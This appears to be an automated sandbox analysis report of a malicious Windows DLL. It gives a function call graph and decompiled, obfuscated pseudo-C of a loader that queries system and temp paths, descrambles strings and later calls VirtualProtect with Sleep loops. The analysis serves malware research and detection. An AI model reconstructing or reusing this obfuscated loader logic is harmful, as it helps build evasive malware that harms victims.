26287 6e201ff2 26220->26287 26222 6e2015a9 26297 6e204401 26222->26297 26224 6e2015b5 26225 6e204401 79 API calls 26224->26225 26226 6e2015c1 26225->26226 26227 6e204197 28 API calls 26226->26227 26228 6e20168f 26227->26228 26229 6e201e10 28 API calls 26228->26229 26230 6e20169a 26229->26230 26231 6e205dab 28 API calls 26230->26231 26232 6e2016c8 26231->26232 26233 6e204197 28 API calls 26232->26233 26234 6e2016d9 26233->26234 26235 6e201e10 28 API calls 26234->26235 26236 6e2016e4 __Stoullx 26235->26236 26307 6e1ffb4a 26236->26307 26238 6e201a4b numpunct 26238->26199 26314 6e206062 26239->26314 26241 6e2014dd 26242 6e204197 26241->26242 26243 6e2041a3 __EH_prolog3_GS 26242->26243 26244 6e2041c0 26243->26244 26338 6e203751 28 API calls 4 library calls 26243->26338 26246 6e2041d9 26244->26246 26247 6e20420f 26244->26247 26248 6e201f9a std::ios_base::_Init 28 API calls 26246->26248 26250 6e201f9a std::ios_base::_Init 28 API calls 26247->26250 26249 6e2041e2 26248->26249 26339 6e205c7e 28 API calls 26249->26339 26252 6e20421d 26250->26252 26342 6e2040e5 28 API calls collate 26252->26342 26253 6e2041f9 26340 6e202b76 26 API calls _Deallocate 26253->26340 26256 6e20422d 26343 6e200bc1 28 API calls 3 library calls 26256->26343 26257 6e204201 26341 6e22008a 5 API calls __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 26257->26341 26260 6e20423a 26344 6e223d74 RaiseException 26260->26344 26263 6e20424a 26264 6e205dab 28 API calls 26263->26264 26265 6e2014ec 26264->26265 26266 6e201e10 26265->26266 26345 6e201dfa 26266->26345 26271 6e204273 _wcslen __EH_prolog3_catch 26269->26271 26399 6e20220b 26271->26399 26275 6e2043f8 numpunct 26275->26218 26276 6e2042d3 26403 6e203a25 26276->26403 26278 6e2020e5 __EH_prolog3_catch 26277->26278 26279 6e20220b 42 API calls 26278->26279 26280 6e2020f8 26279->26280 26286 6e20212a std::ios_base::_Ios_base_dtor 26280->26286 26424 6e2046ab 77 API calls 8 library calls 26280->26424 26281 6e203a25 42 API calls 26282 6e2021ab 26281->26282 26283 6e2021c1 42 API calls 26282->26283 26285 6e2021b3 numpunct 26283->26285 26285->26220 26286->26281 26288 6e201ffe __EH_prolog3_catch 26287->26288 26289 6e20220b 42 API calls 26288->26289 26290 6e202011 26289->26290 26291 6e202043 std::ios_base::_Ios_base_dtor 26290->26291 26425 6e2046ab 77 API calls 8 library calls 26290->26425 26292 6e203a25 42 API calls 26291->26292 26293 6e2020c7 26292->26293 26295 6e2021c1 42 API calls 26293->26295 26296 6e2020cf numpunct 26295->26296 26296->26222 26298 6e20440d __EH_prolog3_catch _strlen 26297->26298 26299 6e20220b 42 API calls 26298->26299 26300 6e204474 26299->26300 26306 6e20447d std::ios_base::_Ios_base_dtor 26300->26306 26426 6e204a80 77 API calls 8 library calls 26300->26426 26301 6e203a25 42 API calls 26302 6e20461a 26301->26302 26304 6e2021c1 42 API calls 26302->26304 26305 6e204622 numpunct 26304->26305 26305->26224 26306->26301 26313 6e1ffb7b 26307->26313 26308 6e20096f 26427 6e1ff218 VirtualProtect __Stoullx 26308->26427 26311 6e200a25 26311->26238 26312 6e2006e7 Sleep 26312->26313 26313->26308 26313->26312 26315 6e20606e __EH_prolog3 26314->26315 26320 6e204a32 26315->26320 26317 6e206077 26328 6e201f9a 26317->26328 26319 6e20608f numpunct 26319->26241 26321 6e204a45 26320->26321 26322 6e204a3d 26320->26322 26324 6e204a51 26321->26324 26326 6e21f8b6 numpunct 22 API calls 26321->26326 26332 6e205940 28 API calls 3 library calls 26322->26332 26324->26317 26325 6e204a43 26325->26317 26327 6e204a4f 26326->26327 26327->26317 26329 6e201fb4 _strlen 26328->26329 26333 6e202c1c 26329->26333 26331 6e201fc1 26331->26319 26332->26325 26334 6e202c4f 26333->26334 26336 6e202c2b BuildCatchObjectHelperInternal 26333->26336 26337 6e2048ac 28 API calls 4 library calls 26334->26337 26336->26331 26337->26336 26338->26244 26339->26253 26340->26257 26342->26256 26343->26260 26344->26263 26348 6e2028d1 26345->26348 26349 6e202911 26348->26349 26350 6e20293c 26348->26350 26385 6e20385a 28 API calls std::_Winerror_message 26349->26385 26351 6e202a38 26350->26351 26387 6e20385a 28 API calls std::_Winerror_message 26350->26387 26354 6e202a73 26351->26354 26355 6e202a43 26351->26355 26395 6e205025 28 API calls _Deallocate 26354->26395 26358 6e202a68 26355->26358 26359 6e202a48 26355->26359 26356 6e202924 26386 6e2047e8 28 API calls 26356->26386 26364 6e203ba9 28 API calls 26358->26364 26362 6e202a5d 26359->26362 26363 6e202a4d 26359->26363 26361 6e202a59 26396 6e204a54 26 API calls 2 library calls 26361->26396 26394 6e202b76 26 API calls _Deallocate 26362->26394 26365 6e202a83 26363->26365 26393 6e2052f2 26 API calls _Deallocate 26363->26393 26364->26361 26379 6e203ba9 26365->26379 26371 6e202952 26378 6e202937 26371->26378 26388 6e203885 28 API calls std::_Winerror_message 26371->26388 26374 6e201dfa 28 API calls 26374->26378 26378->26351 26378->26374 26389 6e2047e8 28 API calls 26378->26389 26390 6e203bd9 28 API calls 26378->26390 26391 6e203885 28 API calls std::_Winerror_message 26378->26391 26392 6e2036e8 28 API calls 26378->26392 26380 6e203bb1 26379->26380 26381 6e201e0c 26379->26381 26397 6e203bd9 28 API calls 26380->26397 26381->26216 26383 6e203bbb 26398 6e204a54 26 API calls 2 library calls 26383->26398 26385->26356 26386->26378 26387->26371 26388->26371 26389->26378 26390->26378 26391->26378 26392->26378 26393->26361 26394->26361 26395->26361 26396->26365 26397->26383 26398->26381 26400 6e202217 __EH_prolog3 26399->26400 26401 6e202248 numpunct 26400->26401 26410 6e203968 42 API calls 2 library calls 26400->26410 26401->26276 26411 6e1e1eea 26403->26411 26405 6e203a3f 26406 6e2021c1 26405->26406 26407 6e2021eb 26406->26407 26408 6e2021f6 26407->26408 26423 6e2039cd 42 API calls 2 library calls 26407->26423 26408->26275 26410->26401 26412 6e1e1f45 26411->26412 26413 6e1e1f01 26411->26413 26412->26405 26414 6e1e1f3a 26413->26414 26420 6e1e1ca2 40 API calls std::ios_base::_Init 26413->26420 26422 6e223d74 RaiseException 26414->26422 26416 6e1e1f53 26416->26405 26418 6e1e1f2e 26421 6e1e1ebd 28 API calls std::ios_base::_Init 26418->26421 26420->26418 26421->26414 26422->26416 26423->26408 26424->26286 26425->26291 26426->26306 26427->26311 26567 6e1e1b25 21 API calls 2 library calls 26662 6e203d1c 26 API calls std::_Winerror_message 26568 6e220f1c 48 API calls 2 library calls 26570 6e25df65 41 API calls 4 library calls 26571 6e223f60 6 API calls 3 library calls 26667 6e206d6b 21 API calls _Yarn 26574 6e206770 LeaveCriticalSection LeaveCriticalSection std::_Lockit::~_Lockit 26575 6e217b76 81 API calls 3 library calls 26437 6e21fd7c 26438 6e21fd88 CallCatchBlock 26437->26438 26455 6e21fab0 26438->26455 26440 6e21fd8f 26441 6e21fdb9 26440->26441 26442 6e21fe7e 26440->26442 26449 6e21fd94 ___scrt_is_nonwritable_in_current_image 26440->26449 26466 6e21fa12 26441->26466 26482 6e2207a7 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 26442->26482 26445 6e21fe85 26446 6e21fdc8 __RTC_Initialize 26446->26449 26469 6e220a88 InitializeSListHead 26446->26469 26448 6e21fdd6 ___scrt_initialize_default_local_stdio_options 26470 6e24aac1 26448->26470 26453 6e21fdf5 26453->26449 26478 6e24aa65 26453->26478 26456 6e21fab9 26455->26456 26483 6e220604 IsProcessorFeaturePresent 26456->26483 26458 6e21fac5 26484 6e223ead 10 API calls 3 library calls 26458->26484 26460 6e21faca 26461 6e21face 26460->26461 26485 6e24aa1c 26460->26485 26461->26440 26464 6e21fae5 26464->26440 26501 6e21fae9 26466->26501 26468 6e21fa19 26468->26446 26469->26448 26472 6e24aad8 26470->26472 26471 6e21f8a5 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 26473 6e21fdea 26471->26473 26472->26471 26473->26449 26474 6e21f9e7 26473->26474 26475 6e21f9ec ___scrt_release_startup_lock 26474->26475 26476 6e21f9f5 26475->26476 26508 6e220604 IsProcessorFeaturePresent 26475->26508 26476->26453 26479 6e24aa94 26478->26479 26480 6e21f8a5 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 26479->26480 26481 6e24aabd 26480->26481 26481->26449 26482->26445 26483->26458 26484->26460 26489 6e25aca1 26485->26489 26488 6e223eec 8 API calls 3 library calls 26488->26461 26490 6e25acba 26489->26490 26493 6e21f8a5 26490->26493 26492 6e21fad7 26492->26464 26492->26488 26494 6e21f8b0 IsProcessorFeaturePresent 26493->26494 26495 6e21f8ae 26493->26495 26497 6e2202c4 26494->26497 26495->26492 26500 6e220288 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 26497->26500 26499 6e2203a7 26499->26492 26500->26499 26502 6e21faf8 26501->26502 26503 6e21fafc 26501->26503 26502->26468 26506 6e21fb09 ___scrt_release_startup_lock 26503->26506 26507 6e2207a7 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 26503->26507 26505 6e21fb8d 26506->26468 26507->26505 26508->26476 26576 6e208f40 30 API calls 2 library calls 26671 6e1e157a 39 API calls __Getctype 26675 6e209951 TlsSetValue 26580 6e206759 LeaveCriticalSection std::_Lockit::~_Lockit 26677 6e1e159d 38 API calls __Getcvt 26583 6e206faa 4 API calls 2 library calls 26678 6e2179ab 82 API calls 26682 6e220daf 51 API calls 2 library calls 26685 6e213db9 46 API calls 2 library calls 26584 6e209783 CreateEventW 26687 6e20a597 89 API calls std::locale::_Locimp::_Locimp_Addfac 26689 6e25e19f 44 API calls 4 library calls 26587 6e206b9d 29 API calls 3 library calls 26592 6e25e3ef 42 API calls 4 library calls 26428 6e24c7ef 26434 6e24c7fc std::_Locinfo::_W_Getdays 26428->26434 26429 6e24c83c 26436 6e242281 20 API calls __dosmaperr 26429->26436 26430 6e24c827 RtlAllocateHeap 26432 6e24c83a 26430->26432 26430->26434 26434->26429 26434->26430 26435 6e249256 7 API calls 2 library calls 26434->26435 26435->26434 26436->26432 26690 6e20c9ec 79 API calls 3 library calls 26595 6e20fff3 42 API calls _Mpunct 26692 6e2071fa 44 API calls 2 library calls 26596 6e219ffa GetStringTypeW __Getwctypes 26693 6e2171c4 56 API calls std::locale::_Locimp::_Makeushloc

                          Executed Functions

                          Function 6E201285, Relevance: 39.1, APIs: 3, Strings: 19, Instructions: 597COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 0 6e201285-6e2012cb call 6e2200ac 3 6e201316-6e201328 0->3 4 6e2012cd 0->4 7 6e20132b-6e20132e 3->7 5 6e2012d3-6e201310 4->5 6 6e2012cf-6e2012d1 4->6 5->3 6->3 6->5 8 6e201330-6e201361 call 6e2201e0 7->8 9 6e201366-6e201371 7->9 11 6e201373-6e20137e 8->11 15 6e201363 8->15 9->7 9->11 13 6e201390-6e2013a4 11->13 14 6e201380-6e201386 11->14 17 6e2013aa-6e2013fb GetSystemDirectoryA 13->17 14->13 16 6e201388-6e20138e 14->16 15->9 16->17 18 6e201401-6e201403 17->18 19 6e201405-6e20143a call 6e2201e0 18->19 20 6e201449-6e201452 18->20 22 6e201454-6e20147a call 6e200d32 GetTempPathA 19->22 26 6e20143c-6e201442 19->26 20->18 20->22 27 6e2014b1 22->27 28 6e20147c-6e2014af 22->28 26->20 29 6e2014b7-6e201501 call 6e200d32 call 6e205dab call 6e204197 call 6e201e10 27->29 28->29 38 6e201503-6e20151a 29->38 39 6e20151c-6e20152c 29->39 40 6e201531-6e201558 call 6e24179f 38->40 39->40 43 6e201578-6e20158d 40->43 44 6e20155a-6e201576 40->44 45 6e201593-6e2015d2 call 6e204267 call 6e2020d9 call 6e201ff2 call 6e204401 * 2 43->45 44->45 56 6e2015d8-6e2015e1 45->56 57 6e2015e3-6e2015fa 56->57 58 6e2015fc-6e201605 56->58 57->58 58->56 59 6e201607-6e201629 call 6e24179f 58->59 62 6e201644-6e201654 59->62 63 6e20162b-6e201631 59->63 65 6e20165a-6e201735 call 6e204197 call 6e201e10 call 6e200ef6 call 6e205dab call 6e204197 call 6e201e10 62->65 63->62 64 6e201633-6e201642 63->64 64->65 78 6e201737-6e20173e 65->78 79 6e201740-6e201746 78->79 80 6e201748-6e201763 78->80 79->80 81 6e20176d-6e201776 79->81 80->81 82 6e201765-6e20176b 80->82 81->78 83 6e201778-6e2017cc call 6e200d32 81->83 82->81 82->83 86 6e2017e9-6e2017f8 83->86 87 6e2017ce-6e2017e7 83->87 88 6e2017fb-6e20180c 86->88 87->88 89 6e20180f-6e201812 88->89 90 6e201814-6e201840 call 6e2201e0 89->90 91 6e201878-6e20187b 89->91 95 6e201852-6e201861 90->95 96 6e201842 90->96 93 6e201845-6e201850 91->93 93->89 93->95 97 6e201863-6e20186b 95->97 98 6e20187d-6e20188e 95->98 96->93 97->98 99 6e20186d-6e201876 97->99 100 6e201891-6e201897 98->100 99->100 101 6e2018b1 100->101 102 6e201899-6e2018af 100->102 103 6e2018b4-6e2018d2 101->103 102->103 104 6e2018d8-6e2018e1 103->104 105 6e2018e3-6e201906 104->105 106 6e20190c-6e20191a 104->106 105->106 106->104 107 6e20191c-6e20192e 106->107 108 6e201931-6e201935 107->108 109 6e201961-6e20196c 108->109 110 6e201937-6e201955 108->110 109->108 112 6e20196e-6e201993 call 6e201029 109->112 111 6e201957-6e20195a 110->111 110->112 111->109 115 6e2019a1-6e2019b8 112->115 116 6e201995-6e20199f 112->116 117 6e2019ba-6e2019e9 115->117 118 6e2019eb 115->118 116->115 119 6e2019ee 117->119 118->119 120 6e2019f3-6e2019fc 119->120 121 6e201a0c-6e201a17 120->121 122 6e2019fe-6e201a0a 120->122 121->120 123 6e201a19-6e201a2c 121->123 122->121 124 6e201a39-6e201a46 call 6e1ffb4a 123->124 125 6e201a2e-6e201a33 123->125 127 6e201a4b-6e201a56 124->127 125->124 128 6e201a5c-6e201a64 127->128 129 6e201a66-6e201a6c 128->129 130 6e201a6e-6e201a8b 128->130 129->130 131 6e201a91-6e201a9a 129->131 130->131 131->128 132 6e201a9c-6e201aa5 131->132 133 6e201ae5-6e201b07 call 6e220075 132->133 134 6e201aa7 132->134 136 6e201aa9-6e201aab 134->136 137 6e201aad-6e201adf 134->137 136->133 136->137 137->133
                          C-Code - Quality: 73%
                          			E6E201285(void* __ebx, void* __edi, void* __esi) {
				signed int _t127;
				signed int _t129;
				signed int _t131;
				signed int _t133;
				void* _t135;
				int _t139;
				signed int _t142;
				signed int _t146;
				void* _t149;
				signed int _t151;
				signed int _t153;
				void* _t155;
				signed int _t156;
				void* _t164;
				signed int _t168;
				void* _t169;
				signed int _t171;
				void* _t174;
				signed int _t176;
				signed int _t178;
				signed int _t180;
				signed int _t183;
				signed int _t184;
				signed int _t185;
				signed int _t186;
				signed int _t188;
				signed int _t190;
				signed int _t191;
				signed short* _t193;
				signed int _t195;
				void* _t197;
				signed int _t201;
				signed int _t202;
				signed int _t208;
				signed int _t209;
				signed int _t213;
				signed int _t216;
				signed int _t222;
				void* _t229;
				signed int _t242;
				signed int _t245;
				signed int _t256;
				signed int _t261;
				signed int _t262;
				signed int _t263;
				signed int _t268;
				void* _t270;
				signed int _t272;
				signed int _t277;
				void* _t281;
				signed int _t282;
				signed int _t286;
				signed int* _t287;
				signed int _t291;
				signed int _t294;
				signed int _t296;
				signed int _t297;
				signed int _t298;
				signed int _t300;
				void* _t301;
				intOrPtr* _t303;
				signed int _t305;
				signed int _t306;
				signed int _t315;
				signed int _t318;
				signed int _t319;
				signed int _t320;
				signed int _t324;
				signed int _t327;
				signed int _t329;
				signed int _t331;
				signed int _t333;
				signed int _t336;
				signed int _t340;
				signed int _t342;
				signed short _t346;
				signed int _t347;
				signed int _t348;
				signed int _t349;
				signed int _t350;
				signed int _t354;
				signed int _t358;
				signed short* _t360;
				signed int _t362;
				signed int _t364;
				signed int _t369;
				signed int _t371;
				signed int _t372;
				signed int _t375;
				signed int _t380;
				signed int _t381;
				signed int _t382;
				signed int _t383;
				signed int _t386;
				signed int _t389;
				signed int _t390;
				signed int _t391;
				signed int _t393;
				signed int _t394;
				signed int _t395;
				signed int _t396;
				void* _t400;
				void* _t401;
				signed int _t402;
				signed int _t403;
				signed int _t404;
				void* _t405;
				void* _t411;
				intOrPtr _t412;
				void* _t417;
				void* _t418;
				void* _t419;
				void* _t422;
				intOrPtr _t423;
				intOrPtr _t426;
				void* _t427;
				void* _t428;
				void* _t434;
				intOrPtr _t435;
				void* _t446;
				void* _t450;
				signed int _t451;
				void* _t452;
				void* _t453;
				void* _t456;

				_t260 = __ebx;
				E6E2200AC(0x6e267e6f, __ebx, __edi, __esi, 0x2c);
				_t324 =  *0x6e2c5a90; // 0x9dec7d1b
				_t127 =  *0x6e2c59d0; // 0x96574ad2
				_t261 =  *0x6e2c59d8; // 0x69ab5d81
				_t380 =  *0x6e2c59dc; // 0x0
				_t358 =  *0x6e2c5a00; // 0x0
				_t405 = 0 - _t380;
				_t327 =  *0x6e2c5a90; // 0x9dec7d1b
				 *(_t400 - 0x18) = _t127 + _t324 + 0x31f;
				_t129 = _t261;
				 *(_t400 - 0x2c) = _t129;
				 *(_t400 - 0x1c) = _t380;
				if(_t405 >= 0 && (_t405 > 0 || _t358 >= _t129)) {
					_push(0);
					_t358 = _t358 - _t129 * 0x3d + 0xfffffd1c;
					 *0x6e2c5a58 =  *0x6e2c5a58 + 0xfffffd1c;
					 *0x6e2c5a00 = _t358;
					asm("adc dword [0x6e2c5a5c], 0xffffffff");
					_t380 = 0;
					asm("sbb esi, [ebp-0x1c]");
					_t261 = _t358 -  *(_t400 - 0x2c) + 0x2e4;
					 *0x6e2c59d8 = _t261;
					asm("adc esi, eax");
					 *0x6e2c59dc = 0;
				}
				 *(_t400 - 0x28) =  *0x6e2c59e6 & 0x0000ffff;
				_t131 = 0x6e2c59e6;
				 *(_t400 - 0x2c) = 0x6e2c59e6;
				 *(_t400 - 0x1c) = 0x6e2c59e6;
				do {
					if(_t358 ==  *(_t400 - 0x28)) {
						goto L8;
					} else {
						asm("cdq");
						_t133 = E6E2201E0( *_t131 & 0x0000ffff, _t327, _t261, _t380);
						_t380 = _t327;
						_t261 = _t133;
						_t327 = _t358 + 5 + _t261;
						 *0x6e2c59d8 = _t261;
						 *0x6e2c59dc = _t380;
						 *0x6e2c5a90 = _t327;
						if(_t327 != ( *0x6e2c59f0 & 0x0000ffff)) {
							_t131 =  *(_t400 - 0x1c);
							goto L8;
						}
					}
					break;
					L8:
					_t131 = _t131 + 2;
					 *(_t400 - 0x1c) = _t131;
				} while (_t131 < 0x6e2c5a44);
				_t135 = 6;
				_t411 =  *0x6e2c5a98 - _t135; // 0x6e26e664
				if(_t411 != 0) {
					L12:
					_t262 = _t261 - 0x27 +  *(_t400 - 0x18) * 0x3d;
					__eflags = _t262;
					 *0x6e2c59d8 = _t262;
					_t263 =  *(_t400 - 0x18);
					asm("sbb esi, edi");
					 *0x6e2c59dc = _t380;
				} else {
					_t412 =  *0x6e2c5a9c; // 0x0
					if(_t412 != 0) {
						goto L12;
					} else {
						_t263 = _t261 + 0x11e05;
					}
				}
				 *0x6e2c59d0 = _t263 - _t327 * 0x3d - 0x2e4;
				_t139 = GetSystemDirectoryA("C:\Windows\system32", 0x56d);
				_t381 =  *0x6e2c5a00; // 0x0
				_t266 = _t139;
				_t329 = 0;
				_t360 = 0x6e2c59e6;
				 *0x6e2c5a90 = _t139 -  *0x6e2c5a90 +  *0x6e2c59d0;
				_t142 =  *0x6e2c59e6 & 0x0000ffff;
				 *0x6e2c59d8 = _t139;
				 *(_t400 - 0x1c) = 0;
				 *0x6e2c59dc = 0;
				do {
					if(_t381 == _t142) {
						goto L17;
					} else {
						asm("cdq");
						_t266 = E6E2201E0( *_t360 & 0x0000ffff, _t329, _t266,  *(_t400 - 0x1c));
						_t256 = _t329;
						 *0x6e2c59d8 = _t266;
						 *(_t400 - 0x1c) = _t256;
						_t381 = _t381 + 5 + _t266;
						 *0x6e2c59dc = _t256;
						 *0x6e2c5a90 = _t381;
						if(_t381 != ( *0x6e2c59f0 & 0x0000ffff)) {
							_t381 =  *0x6e2c5a00; // 0x0
							_t142 =  *0x6e2c59e6 & 0x0000ffff;
							goto L17;
						}
					}
					break;
					L17:
					_t360 =  &(_t360[1]);
				} while (_t360 < 0x6e2c5a44);
				 *0x6e2c59d0 = E6E200D32();
				GetTempPathA(0x56d, "C:\Users\hardz\AppData\Local\Temp\");
				_t417 =  *0x6e2c5a04 - 0x1b47; // 0xac
				if(_t417 == 0) {
					_t318 =  *0x6e2c5a90; // 0x9dec7d1b
					_t319 = _t318 + ( *0x6e2c59e6 & 0x0000ffff);
					 *0x6e2c5a90 = _t319;
					_push(0);
					_t320 =  *0x6e2c59d8; // 0x69ab5d81
					asm("adc [0x6e2c59dc], eax");
					 *0x6e2c59d8 = _t320 + 0x3b + _t319 * 2;
				}
				_t146 = E6E200D32();
				_t402 = _t401 - 0x10;
				 *0x6e2c59d0 = _t146;
				_t268 = _t402;
				 *(_t400 - 0x34) = _t402;
				_t330 = "6265";
				 *_t268 = 0;
				 *((intOrPtr*)(_t268 + 8)) = 0;
				 *((intOrPtr*)(_t268 + 0xc)) = 0;
				E6E205DAB(_t268, "6265");
				_push("Had s");
				 *(_t400 - 4) = 0;
				_t149 = E6E204197(_t260, "6265", 0, _t381);
				 *(_t400 - 4) =  *(_t400 - 4) | 0xffffffff;
				E6E201E10(_t149);
				_t270 = 6;
				_t418 =  *0x6e2c5a02 - _t270; // 0x0
				if(_t418 == 0) {
					_t151 =  *0x6e2c59d8; // 0x69ab5d81
					_t153 = _t151 + 0x11dde +  *0x6e2c59d0;
					__eflags = _t153;
					 *0x6e2c5a90 = _t153;
				} else {
					_t315 =  *0x6e2c59d8; // 0x69ab5d81
					 *0x6e2c59d0 =  *0x6e2c59d0 +  ~_t315 -  *0x6e2c5a90 * 0x3d;
				}
				_push("cd Island"); // executed
				E6E24179F(_t260, _t330, 0, _t381);
				_t382 =  *0x6e2c59d0; // 0x96574ad2
				_t155 = 6;
				_t25 = _t382 - 0x338; // 0x9657479a
				_t272 = _t25;
				 *0x6e2c5a90 = _t272;
				_t419 =  *0x6e2c5a02 - _t155; // 0x0
				if(_t419 == 0) {
					_t331 =  *0x6e2c5a00; // 0x0
					_t156 = 0;
					 *0x6e2c59dc = 0;
					_t333 = _t331 + 0x11dde + _t272;
					__eflags = _t333;
					 *0x6e2c59d8 = _t333;
				} else {
					_t333 =  *0x6e2c59d8; // 0x69ab5d81
					_t156 =  *0x6e2c59dc; // 0x0
					 *0x6e2c5a90 = _t272 - _t333 * 0x3d -  *0x6e2c5a00;
				}
				_push(_t156);
				_push(_t333);
				_push(_t382);
				E6E204401(_t260, E6E204401(_t260, E6E201FF2(_t260, E6E2020D9(_t260, E6E204267(_t260, 0, _t382, _t419), _t333, 0, _t382), _t333, 0, _t382), 0x6e2c8150, 0, _t382, _t419), "part ", 0, _t382, _t419);
				_t336 =  *0x6e2c5a00; // 0x0
				_t277 = 0x6e2c5a0e;
				_t362 =  *0x6e2c59dc; // 0x0
				_t383 =  *0x6e2c59d8; // 0x69ab5d81
				do {
					if(_t336 != ( *0x6e2c59e2 & 0x0000ffff)) {
						 *_t277 =  *_t277 + _t336;
						_t26 = _t336 + 5; // 0x5
						_t245 = _t26 + _t383;
						 *0x6e2c5a90 = _t245;
						_t383 = _t383 + _t245 + 0x3b + _t336;
						_push(0);
						asm("adc edi, eax");
					}
					_t277 = _t277 - 4;
				} while (_t277 > 0x6e2c59e2);
				_push("cd Matter m");
				 *0x6e2c59d8 = _t383;
				 *0x6e2c59dc = _t362; // executed
				E6E24179F(_t260, _t336, _t362, _t383); // executed
				_t164 = 6;
				_t422 =  *0x6e2c5a98 - _t164; // 0x6e26e664
				if(_t422 != 0) {
					L34:
					 *0x6e2c59d8 =  *0x6e2c59d8 - 0x27 +  *0x6e2c59d0 * 0x3d;
					asm("sbb [0x6e2c59dc], ecx");
				} else {
					_t423 =  *0x6e2c5a9c; // 0x0
					if(_t423 != 0) {
						goto L34;
					} else {
						_t242 =  *0x6e2c59d8; // 0x69ab5d81
						 *0x6e2c59d0 = _t242 + 0x11e05;
					}
				}
				_t403 = _t402 - 0x10;
				 *(_t400 - 0x34) = _t403;
				 *0x6e2c5a90 =  *0x6e2c5a90 * 0x29266b;
				_t168 = _t403;
				 *_t168 = 5;
				 *((intOrPtr*)(_t168 + 8)) = 0x5c7;
				 *((intOrPtr*)(_t168 + 0xc)) = 0;
				_push("Molecul");
				 *(_t400 - 4) = 1;
				_t169 = E6E204197(_t260, _t336, _t362, _t383);
				 *(_t400 - 4) =  *(_t400 - 4) | 0xffffffff;
				E6E201E10(_t169);
				_t281 = 0x27;
				_t171 = E6E200EF6(_t281);
				_t404 = _t403 - 0x10;
				 *0x6e2c59d8 = _t171;
				_t282 = _t404;
				 *(_t400 - 0x34) = _t404;
				 *0x6e2c59dc = 0;
				 *_t282 = 0;
				 *((intOrPtr*)(_t282 + 8)) = 0;
				 *((intOrPtr*)(_t282 + 0xc)) = 0;
				E6E205DAB(_t282, "6623");
				_push("out drop ");
				 *(_t400 - 4) = 2;
				_t174 = E6E204197(_t260, "6623", _t362, _t383);
				 *(_t400 - 4) =  *(_t400 - 4) | 0xffffffff;
				E6E201E10(_t174);
				_t176 =  *0x6e2c59dc; // 0x0
				 *(_t400 - 0x18) =  *0x6e2c59d8 * 0x36 +  *0x6e2c5a90;
				_t286 =  *0x6e2c5a90 * 0x10e1d;
				_t178 =  *0x6e2c59d8; // 0x69ab5d81
				_t287 = 0x6e2c5a28;
				 *0x6e2c59d8 = _t178 * _t286;
				_t340 =  *0x6e2c5a90; // 0x9dec7d1b
				_t180 =  *0x6e2c59d0; // 0x96574ad2
				 *0x6e2c59dc = _t176 * _t286 + (_t178 * _t286 >> 0x20);
				_t386 =  *(_t400 - 0x18);
				_t342 = _t340 + _t386 + _t180 + 0x3b;
				do {
					if( *0x6e2c5a28 != 0x27) {
						L38:
						_t183 =  *_t287 * _t342;
						 *0x6e2c59dc = 0;
						_t342 = _t183;
						_t184 = _t183 + 0x2c;
						 *0x6e2c59d8 = _t184;
						_t427 = _t184 -  *0x6e2c5a50; // 0x4e
						if(_t427 != 0) {
							goto L40;
						} else {
							_t428 = 0 -  *0x6e2c5a54; // 0x0
							if(_t428 != 0) {
								goto L40;
							}
						}
					} else {
						_t426 =  *0x6e2c5a2c; // 0x0
						if(_t426 == 0) {
							goto L40;
						} else {
							goto L38;
						}
					}
					break;
					L40:
					_t287 =  &(_t287[2]);
				} while (_t287 < "or@std@@");
				_t185 = E6E200D32();
				_t364 =  *0x6e2c5a90; // 0x9dec7d1b
				_t49 = _t386 + 0x11dde; // 0x11dde
				 *(_t400 - 0x1c) = _t185;
				 *(_t400 - 0x28) = _t49 + _t364;
				_t291 = _t185 * 0x10e1d;
				_t186 =  *0x6e2c59dc; // 0x0
				_t188 =  *0x6e2c59d8; // 0x69ab5d81
				_t190 =  *0x6e2c59f2 & 0x0000ffff;
				 *(_t400 - 0x10) = _t188 * _t291;
				_t346 =  *0x6e2c59e6; // 0x5145
				 *(_t400 - 0x14) = _t186 * _t291 + (_t188 * _t291 >> 0x20);
				 *(_t400 - 0x34) = _t190;
				if((_t346 & 0x0000ffff) + _t190 != 0x32) {
					_t389 =  *(_t400 - 0x18) * 0x29266b;
					_t191 = _t389 * 0x37;
					__eflags = _t191;
					 *(_t400 - 0x1c) = _t191;
					_t294 = _t191;
					 *(_t400 - 0x20) = _t191;
				} else {
					_t294 =  *(_t400 - 0x1c);
					 *(_t400 - 0x20) = _t294;
					_t389 = _t294 -  *(_t400 - 0x18) *  *(_t400 - 0x18) * 0x10e1d + 0x27;
				}
				 *(_t400 - 0x30) = _t346 & 0x0000ffff;
				_t193 = 0x6e2c59e6;
				 *(_t400 - 0x18) = _t389;
				_t390 =  *(_t400 - 0x10);
				 *(_t400 - 0x24) = 0x6e2c59e6;
				do {
					if(_t294 ==  *(_t400 - 0x30)) {
						_t346 =  *(_t400 - 0x14);
						goto L48;
					} else {
						asm("cdq");
						_t195 = E6E2201E0( *_t193 & 0x0000ffff, _t346, _t390,  *(_t400 - 0x14));
						_t294 =  *(_t400 - 0x20);
						_t390 = _t195;
						 *(_t400 - 0x14) = _t346;
						_t364 = _t294 + 5 + _t390;
						 *0x6e2c5a90 = _t364;
						if(_t364 != ( *0x6e2c59f0 & 0x0000ffff)) {
							_t193 =  *(_t400 - 0x24);
							goto L48;
						}
					}
					break;
					L48:
					_t193 =  &(_t193[1]);
					 *(_t400 - 0x24) = _t193;
				} while (_t193 < 0x6e2c5a44);
				_t197 = 6;
				 *(_t400 - 0x10) = _t390;
				_t391 =  *(_t400 - 0x18);
				_t434 =  *0x6e2c5a98 - _t197; // 0x6e26e664
				if(_t434 != 0) {
					L53:
					_push(0);
					_t296 =  *(_t400 - 0x10) - 0x27 +  *(_t400 - 0x28) * 0x3d;
					__eflags = _t296;
					asm("sbb edx, eax");
					_t201 =  *(_t400 - 0x28);
				} else {
					_t435 =  *0x6e2c5a9c; // 0x0
					if(_t435 != 0) {
						goto L53;
					} else {
						_t296 =  *(_t400 - 0x10);
						_t83 = _t296 + 0x11e05; // 0x11e05
						_t201 = _t83;
					}
				}
				 *(_t400 - 0x30) = _t364;
				if( *(_t400 - 0x34) > _t364) {
